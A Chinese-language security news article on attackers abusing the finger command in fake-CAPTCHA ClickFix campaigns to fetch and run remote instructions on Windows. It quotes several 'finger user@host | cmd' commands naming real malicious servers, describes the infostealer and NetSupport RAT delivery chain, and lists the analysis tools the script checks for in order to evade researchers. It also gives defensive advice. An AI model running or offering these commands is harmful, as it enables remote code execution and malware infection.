有着数十年历史的 finger 协议正重新活跃，威胁者借助这一协议获取远程指令，在 Windows 设备上执行恶意操作。

过去，人们通过 Finger 协议，在 Unix 与 Linux 系统中使用 finger 命令查询本地及远程用户信息，该命令后续也被加入 Windows 系统。尽管目前仍受支持，但相较于数十年前的普及度，如今其使用率已大幅下降。

执行 finger 命令后，会返回用户的基础信息，包括登录名、用户名（若在 /etc/passwd 中设置）、主目录、电话号码、最后活跃时间及其他详情。

手指命令输出

近期，多起恶意攻击活动开始利用 Finger 协议，疑似通过 "ClickFix 攻击 " 获取指令并在设备上执行。

这并非 finger 命令首次被如此滥用——早在 2020 年，研究人员就曾发出警告，指出该命令已被用作 " Living-off-the-Land Binary（ LOLBIN，合法系统工具滥用）"，用于下载恶意软件并规避检测。

finger 命令遭恶意滥用

上月，网络安全研究员分享了一个批处理文件。该文件执行后，会运行 "finger root@finger.nateams [ . ] com" 命令，从远程 finger 服务器获取指令，再通过管道符传递给 cmd.exe 在本地执行。

手指命令输出

目前该服务器已无法访问，但 MalwareHunterTeam 又发现了更多利用 finger 命令的恶意软件样本与攻击活动。例如，Reddit 平台上有用户近期发文警示，称自己遭遇了一场伪装成验证码验证的 ClickFix 攻击——攻击者诱导其运行一条 Windows 命令，以 " 证明自己是人类 "。

尽管目前该服务器已不再响应 finger 请求，但另一位 Reddit 用户捕获了此前的输出结果。这类攻击将 Finger 协议用作远程脚本传输工具：通过运行 "finger vke@finger.cloudmega [ . ] org" 命令，将输出结果通过管道符传递给 Windows 命令处理器 cmd.exe。

这一操作会触发获取到的指令执行：创建随机命名的路径，将 curl.exe 复制为随机文件名，通过重命名后的 curl 程序从 cloudmega [ . ] org 下载伪装成 PDF 文件的压缩包，并解压出一个 Python 恶意软件包。

伪装成 PDF 的档案内容

随后，系统会通过 "pythonw.exe __init__.py" 命令执行该 Python 程序。最终执行的指令会向攻击者的服务器回传 " 执行成功 " 的确认信息，同时向用户显示伪造的 " 验证你是人类 " 提示框。

目前尚不清楚该 Python 恶意软件包的具体用途，但从一个关联批处理文件可推断，其应为一款信息窃取工具。

安全员还发现了另一项类似攻击活动：通过 "finger Kove2@api.metrics-strange.com | cmd" 命令获取并执行指令，操作流程与上述 ClickFix 攻击几乎一致。

finger 命令的输出

分析发现，这一攻击手段更为成熟——指令会先检测设备中是否存在恶意软件研究常用工具，若发现则终止攻击。这些工具包括 filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg 及 ProcessHacker。

若未检测到恶意软件分析工具，指令会下载伪装成 PDF 的压缩包并解压。但与此前不同的是，该压缩包中并非 Python 恶意软件包，而是 NetSupport Manager 远程访问工具（RAT）安装包。

NetSupport Manager RAT

随后，指令会配置一个计划任务，确保用户登录时自动启动该远程访问恶意软件。

目前来看，此类 finger 命令滥用活动似乎由单一威胁者发起，且主要通过 ClickFix 攻击实施。但鉴于仍有用户持续上当，相关攻击活动需引起高度警惕。

对于防御方而言，阻止 finger 命令滥用的最佳方式是拦截流向 TCP 79 端口的出站流量——该端口是 Finger 协议用于连接守护进程的专用端口。